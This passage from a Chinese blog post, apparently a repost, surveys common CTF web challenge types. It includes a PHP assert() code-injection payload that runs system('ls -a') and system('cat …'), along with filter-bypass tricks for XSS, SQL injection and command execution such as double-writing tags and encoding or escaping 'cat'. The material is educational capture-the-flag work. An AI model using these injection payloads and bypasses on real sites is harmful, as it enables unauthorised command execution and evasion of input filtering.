?&gt; </code></pre><p>解法：<br>构造闭合 file_exists()函数，并使assert()执行恶意代码。<br>Linux命令ls -a可用于查看该目录下所有文件，包括隐藏文件。</p>
<p>payload：</p>
<pre><code>?file=123&#39;) or system(&#39;ls -a&#39;);#
?file=123&#39;) or system(&#39;cat .ffll44gg&#39;);#</code></pre><h2 id="XSS题目"><a href="#XSS题目" class="headerlink" title="XSS题目"></a>XSS题目</h2><p>这类题目会涉及到三种XSS类型，具体类型要根据题目来判断。一般都是向后台发送一个带有XSS Payload的文本，在返回的Cookie中含有flag，解法是在XSS Payload。<br>这类题目一般都会带有过滤和各种限制，需要了解一些常用的绕过方法。<br>姿势：XSS归根结底还是JavaScript，JavaScript的威力有多大，XSS的威力就有多大。要知道一些常用的XSS Payload，还要把三类XSS的原理弄明白。做题时需要用到XSS平台，网上有公用的，也可以自己在VPS上搭一个。</p>
<p>JavisOJ babyxss：<a href="http://web.jarvisoj.com:32800/" target="_blank" rel="noopener">http://web.jarvisoj.com:32800/</a></p>
<h2 id="绕过waf"><a href="#绕过waf" class="headerlink" title="绕过waf"></a>绕过waf</h2><p>其实绝大多数比较难的题目多多少都会对输入有过滤，毕竟在现实的网络中肯定是会对输入进行限制的，但是这里还是把过滤单独列出来了。<br>姿势：多掌握一些不同的绕过方法。</p>
<h2 id="长度限制"><a href="#长度限制" class="headerlink" title="长度限制"></a>长度限制</h2><p>有些题目会要求输入较长的文本，但对文本的长度进行了限制。<br>对于这种题目，既可以用BurpSuite抓包改包绕过，也可以直接在F12里改页面源代码。</p>
<p>Bugku 计算器（修改页面源代码）：<a href="http://123.206.87.240:8002/yanzhengma/" target="_blank" rel="noopener">http://123.206.87.240:8002/yanzhengma/</a><br>DVWA 存储型XSS的标题栏会对长度进行限制，使用BurpSuite抓包绕过。</p>
<h2 id="双写"><a href="#双写" class="headerlink" title="双写"></a>双写</h2><pre><code>双写可以绕过对输入内容过滤的单次判断，在XSS、SQL注入和PHP代码审计的题目中比较常见。
双写顾名思义就是将被过滤的关键字符写两遍，比如，如果要添加XSS  Payload，又需要插入&lt;script&gt;标签，就可以构造如下的Payload：&lt;scr&lt;script&gt;ipt&gt;来绕过对&lt;script&gt;标签的单次过滤限制。
这样的方法不仅对XSS有用，也可以用于代码审计和SQL注入。
HGAME2019有一道XSS题目就是过滤了&lt;script&gt;，可以用双写绕过。</code></pre><h2 id="等价替代"><a href="#等价替代" class="headerlink" title="等价替代"></a>等价替代</h2><pre><code>就是不用被过滤的字符，而使用没有被过滤却会产生相同效果的字符。

比如，如果SQL注入题目中过滤了空格，可以用/**/绕过对空格的限制；XSS题目如果过滤了&lt;script&gt;标签，可以使用其他类型的payload；如果需要使用cat命令却被过滤，可以使用tac、more、less命令来替代等。



实验吧 简单的SQL注入：http://www.shiyanbar.com/ctf/1875</code></pre><h2 id="URL编码绕过"><a href="#URL编码绕过" class="headerlink" title="URL编码绕过"></a>URL编码绕过</h2><p>如果过滤了某个必须要用的字符串，输入的内容是以GET方式获取的（也就是直接在地址栏中输入），可以采用url编码绕过的方式。比如，过滤了 cat，可以使用 c%61t来绕过。</p>
<h2 id="Linux命令使用反斜杠绕过"><a href="#Linux命令使用反斜杠绕过" class="headerlink" title="Linux命令使用反斜杠绕过"></a>Linux命令使用反斜杠绕过</h2><p>在Linux下，命令中加入反斜杠与原命令完全等价。例如，cat与 ca\t两条命令等价，效果完全相同。<br>可以利用这个特性来进行一些绕过操作（当然，这个仅限于命令执行漏洞）。</p>
<h2 id="URL二次解码绕过"><a href="#URL二次解码绕过" class="headerlink" title="URL二次解码绕过"></a>URL二次解码绕过</h2><p>这个类型本来应该放在代码审计里面，但是既然是一种绕过过滤的姿势，就写在这里了。<br>如果源码中出现了urldecode()函数，可以利用url二次解码来绕过。<br>以下是一些常用的HTML URL编码：<br><img src="http://cdn.sijiu.ren/blog/20200501/47qjmfx9KN8u.bmp" alt></p>
<p>Bugku urldecode二次编码绕过：<a href="http://123.206.87.240:9009/10.php" target="_blank" rel="noopener">http://123.206.87.240:9009/10.php</a></p>
<h2 id="数组绕过"><a href="#数组绕过" class="headerlink" title="数组绕过"></a>数组绕过</h2><p>详见PHP代码审计的“数组返回NULL”绕过。<br>数组绕过的应用很广，很多题目都可以用数组绕过。</p>
<h2 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h2><p>SQL注入是一种灵活而复杂的攻击方式，归根结底还是考察对SQL语言的了解和根据输入不同数据网页的反应对后台语句的判断，当然也有sqlmap这样的自动化工具可以使用。<br>姿势：如果不用sqlmap或者是用不了，就一定要把SQL语言弄明白，sqlmap这样的自动化工具也可以使用。</p>
<h2 id="使用sqlmap"><a href="#使用sqlmap" class="headerlink" title="使用sqlmap"></a>使用sqlmap</h2><p>sqlmap的应用范围还不大明确，我都是如果sqlmap没法注入就手工注入。</p>
<p>sqlmap教程：<a href="https://www.jianshu.com/p/4509bdf5e3d0" target="_blank" rel="noopener">https://www.jianshu.com/p/4509bdf5e3d0</a></p>
<p>转载：<a href="https://www.cnblogs.com/daiorz/p/12294963.html" target="_blank" rel="noopener">https://www.cnblogs.com/daiorz/p/12294963.html</a></p>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 1012482327@qq.com </span>
    </div>
</article>


<p>
    <a  class="dashang" onclick="dashangToggle()">赏</a>
</p>


<div class="article_copyright">
    <p><span class="copy-title">文章标题:</span>CTF中Web题目的常见题型及解题姿势</p>
    
    <p><span class="copy-title">本文作者:</span><a  title="亖 玖">亖 玖</a></p>
    <p><span class="copy-title">发布时间:</span>2020-04-30, 23:55:54</p>
    <p><span class="copy-title">最后更新:</span>2020-05-26, 18:41:44</p>
    <span class="copy-title">原始链接:</span><a class="post-url" href="/2020/04/30/CTF%E4%B8%ADWeb%E9%A2%98%E7%9B%AE%E7%9A%84%E5%B8%B8%E8%A7%81%E9%A2%98%E5%9E%8B%E5%8F%8A%E8%A7%A3%E9%A2%98%E5%A7%BF%E5%8A%BF/" title="CTF中Web题目的常见题型及解题姿势">https://sijiu.ren.com/2020/04/30/CTF%E4%B8%ADWeb%E9%A2%98%E7%9B%AE%E7%9A%84%E5%B8%B8%E8%A7%81%E9%A2%98%E5%9E%8B%E5%8F%8A%E8%A7%A3%E9%A2%98%E5%A7%BF%E5%8A%BF/</a>
    <p>
        <span class="copy-title">版权声明:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
    </p>

</div>




    <div id="comments">
    <!-- 来必力City版安装代码 -->
    <div id="lv-container" data-id="city" data-uid="MTAyMC81MDAxMC8yNjUwMQ==">
        <script type="text/javascript">
			(function(d, s) {
				var j, e = d.getElementsByTagName(s)[0];
				if (typeof LivereTower === 'function') { return; }
				j = d.createElement(s);
				window.livereOptions = {
					eagerLoading: true,
					scrollEventTargetSelector: '#post'
                }
				j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
				j.async = true;
				e.parentNode.insertBefore(j, e);
			})(document, 'script');
        </script>
        <noscript> 为正常使用来必力评论功能请激活JavaScript</noscript>
    </div>
    <!-- City版安装代码已完成 -->
</div>
<!-- City版安装代码已完成 -->






    



    </div>
    <div class="copyright">
        <p class="footer-entry">©2020 sijiu</p>

<a href="https://beian.miit.gov.cn/"  style="color:#f72b07" target="_blank">闽ICP备20008705号</a>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/qq1012482327/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>
<meta name="baidu-site-verification" content="FOhb4nUTHp" />

    </div>
    <div class="full-toc">
        <button class="full"><span class="min "></span></button>
<button class="post-toc-menu"><span class="post-toc-menu-icons"></span></button>
<div class="post-toc"><span class="post-toc-title">目录</span>
    <div class="post-toc-content">

    </div>
</div>
<a class="" id="rocket" ></a>

    </div>
</div>
<div class="acParent"></div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close"  onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>喜欢就点赞,疼爱就打赏</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/aaa.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">支付宝</label></span><span><label><input type="radio" name="pay" value="weixin">微信</label></span>
    </div>
</div>


<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/platelet.model.json"},"display":{"position":"right","width":250,"height":500},"mobile":{"show":true},"log":false});</script></body>
<script src="/js/jquery.pjax.js?v=1.0.1" ></script>

<script src="//cdn.bootcss.com/photoswipe/4.1.2/photoswipe.min.js"></script>
<script src="//cdn.bootcss.com/photoswipe/4.1.2/photoswipe-ui-default.min.js"></script>

<script src="/js/script.js?v=1.0.1" ></script>
<script>
    var img_resize = 'photoSwipe';
    /*作者、标签的自动补全*/
    $(function () {
        $('.search').AutoComplete({
            'data': ['#CTF','#运维',],
            'itemHeight': 20,
            'width': 418
        }).AutoComplete('show');
    })
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $(".post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        

        // PhotoSwipe
        $('article').each(function(i){
            $(this).find('img').each(function(){
                if ($(this).closest('figure').hasClass('article-gallery-img')) {
                    return;
                }
                var alt = this.alt;
                $(this)
                    .wrap('<figure class="article-gallery-img" itemprop="associatedMedia" itemscope itemtype="http://schema.org/ImageObject"></figure>')
                    .wrap('<a href="' + this.src + '" title="' + alt + '"></a>');
                $(this).after('<div class="img_alt"><span>' + (alt || '') + '</span></div>');
            });
        });

        var pswpElement = document.querySelectorAll('.pswp')[0];
        if (pswpElement) {
            var gallerySelector = '.article-gallery, article';

            var initPhotoSwipeFromDOM = function(gallerySelector) {

                // parse slide data (url, title, size ...) from DOM elements
                // (children of gallerySelector)
                var parseThumbnailElements = function(el) {
                    var thumbElements = $(el).find('figure.article-gallery-img').toArray(),
                        numNodes = thumbElements.length,
                        items = [],
                        figureEl,
                        linkEl,
                        size,
                        imgEl,
                        item;

                    for (var i = 0; i < numNodes; i++) {

                        figureEl = thumbElements[i]; // <figure> element

                        // include only element nodes
                        if (figureEl.nodeType !== 1) {
                            continue;
                        }

                        linkEl = figureEl.children[0]; // <a> element
                        imgEl = linkEl.children[0]; // <img>

                        size = linkEl.getAttribute('data-size');
                        size = size && size.split('x');

                        // create slide object
                        item = {
                            src: linkEl.getAttribute('href'),
                            w: size && parseInt(size[0], 10) || imgEl.width,
                            h: size && parseInt(size[1], 10) || imgEl.height
                        };

                        if (figureEl.children.length > 1) {
                            // <figcaption> content
                            item.title = figureEl.children[1].innerHTML;
                        }

                        if (linkEl.children.length > 0) {
                            // <img> thumbnail element, retrieving thumbnail url
                            item.msrc = linkEl.children[0].getAttribute('src');
                        }

                        item.el = figureEl; // save link to element for getThumbBoundsFn
                        items.push(item);
                    }

                    return items;
                };

                // find nearest parent element
                var closest = function closest(el, fn) {
                    return el && (fn(el) ? el : closest(el.parentNode, fn));
                };

                // triggers when user clicks on thumbnail
                var onThumbnailsClick = function(e) {
                    e = e || window.event;

                    var eTarget = e.target || e.srcElement;

                    // find root element of slide
                    var clickedListItem = closest(eTarget, function(el) {
                        return (el.tagName && el.tagName.toUpperCase() === 'FIGURE');
                    });

                    if (!clickedListItem) {
                        return;
                    }

                    if (e.preventDefault) {
                        e.preventDefault();
                    } else {
                        e.returnValue = false;
                    }

                    // find index of clicked item by looping through all child nodes
                    // alternatively, you may define index via data- attribute
                    var clickedGallery = $(clickedListItem).closest(gallerySelector)[0],
                        childNodes = $(clickedGallery).find('figure.article-gallery-img').toArray(),
                        numChildNodes = childNodes.length,
                        nodeIndex = 0,
                        index;

                    for (var i = 0; i < numChildNodes; i++) {
                        if (childNodes[i].nodeType !== 1) {
                            continue;
                        }

                        if (childNodes[i] === clickedListItem) {
                            index = nodeIndex;
                            break;
                        }
                        nodeIndex++;
                    }



                    if (index >= 0) {
                        // open PhotoSwipe if valid index found
                        openPhotoSwipe(index, clickedGallery);
                    }
                    return false;
                };

                // parse picture index and gallery index from URL (#&pid=1&gid=2)
                var photoswipeParseHash = function() {
                    var hash = window.location.hash.substring(1),
                        params = {};

                    if (hash.length < 5) {
                        return params;
                    }

                    var vars = hash.split('&');
                    for (var i = 0; i < vars.length; i++) {
                        if (!vars[i]) {
                            continue;
                        }
                        var pair = vars[i].split('=');
                        if (pair.length < 2) {
                            continue;
                        }
                        params[pair[0]] = pair[1];
                    }

                    if (params.gid) {
                        params.gid = parseInt(params.gid, 10);
                    }

                    return params;
                };

                var openPhotoSwipe = function(index, galleryElement, disableAnimation, fromURL) {
                    var pswpElement = document.querySelectorAll('.pswp')[0],
                        gallery,
                        options,
                        items;

                    items = parseThumbnailElements(galleryElement);

                    // define options (if needed)
                    options = {

                        // define gallery index (for URL)
                        galleryUID: galleryElement.getAttribute('data-pswp-uid'),

                        getThumbBoundsFn: function(index) {
                            // See Options -> getThumbBoundsFn section of documentation for more info
                            var thumbnail = items[index].el.getElementsByTagName('img')[0], // find thumbnail
                                pageYScroll = window.pageYOffset || document.documentElement.scrollTop,
                                rect = thumbnail.getBoundingClientRect();

                            return {
                                x: rect.left,
                                y: rect.top + pageYScroll,
                                w: rect.width
                            };
                        }
                    };

                    // PhotoSwipe opened from URL
                    if (fromURL) {
                        if (options.galleryPIDs) {
                            // parse real index when custom PIDs are used
                            // http://photoswipe.com/documentation/faq.html#custom-pid-in-url
                            for (var j = 0; j < items.length; j++) {
                                if (items[j].pid == index) {
                                    options.index = j;
                                    break;
                                }
                            }
                        } else {
                            // in URL indexes start from 1
                            options.index = parseInt(index, 10) - 1;
                        }
                    } else {
                        options.index = parseInt(index, 10);
                    }

                    // exit if index not found
                    if (isNaN(options.index)) {
                        return;
                    }

                    if (disableAnimation) {
                        options.showAnimationDuration = 0;
                    }

                    // Pass data to PhotoSwipe and initialize it
                    gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, options);

                    gallery.listen('imageLoadComplete', function(index, item) {
                        var linkEl = item.el.children[0];
                        var img = item.container.children[0];
                        if (!linkEl.getAttribute('data-size')) {
                            linkEl.setAttribute('data-size', img.naturalWidth + 'x' + img.naturalHeight);
                            item.w = img.naturalWidth;
                            item.h = img.naturalHeight;
                            gallery.invalidateCurrItems();
                            gallery.updateSize(true);
                        }
                    });

                    gallery.init();
                };

                // loop through all gallery elements and bind events
                var galleryElements = document.querySelectorAll(gallerySelector);

                for (var i = 0, l = galleryElements.length; i < l; i++) {
                    galleryElements[i].setAttribute('data-pswp-uid', i + 1);
                    galleryElements[i].onclick = onThumbnailsClick;
                }

                // Parse URL and open gallery if it contains #&pid=3&gid=1
                var hashData = photoswipeParseHash();
                if (hashData.pid && hashData.gid) {
                    openPhotoSwipe(hashData.pid, galleryElements[hashData.gid - 1], true, true);
                }
            };

            // execute above function
            initPhotoSwipeFromDOM(gallerySelector);
        }
        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
        .nav .hide-list.fullscreen {
            left: 492px
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    
    .post .pjax article .article-entry>ol, .post .pjax article .article-entry>ul, .post .pjax article>ol, .post .pjax article>ul{
        border: #e2dede solid 1px;
        border-radius: 10px;
        padding: 10px 32px 10px 56px;
    }
    .post .pjax article .article-entry li>ol, .post .pjax article .article-entry li>ul,.post .pjax article li>ol, .post .pjax article li>ul{
        padding-top: 5px;
        padding-bottom: 5px;
    }
    .post .pjax article .article-entry>ol>li, .post .pjax article .article-entry>ul>li,.post .pjax article>ol>li, .post .pjax article>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    .post .pjax article .article-entry li>ol>li, .post .pjax article .article-entry li>ul>li,.post .pjax article li>ol>li, .post .pjax article li>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    

    /* 背景图样式 */
    
    .post {
        background: url(http://cdn.sijiu.ren/blog/20200714/EKce9M9JqSbP.jpg?imageslim);
    }
    
    
    .post.index {
        background: url(http://cdn.sijiu.ren/blog/20200714/EKce9M9JqSbP.jpg?imageslim);
    }
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.3;
        background: url("https://i.loli.net/2019/07/22/5d3521411f3f169375.png");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe.
         It's a separate element, as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. PhotoSwipe keeps only 3 slides in DOM to save memory. -->
        <!-- don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <!-- Preloader demo https://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>







    <!--给WordPress网站添加鼠标点击爆炸五颜六色特效-->
        <canvas class="fireworks" style="position:fixed;left:0;top:0;z-index:99999999;pointer-events:none;"></canvas>
    <script type="text/javascript" src="/js/djtx.js"></script>


</html>

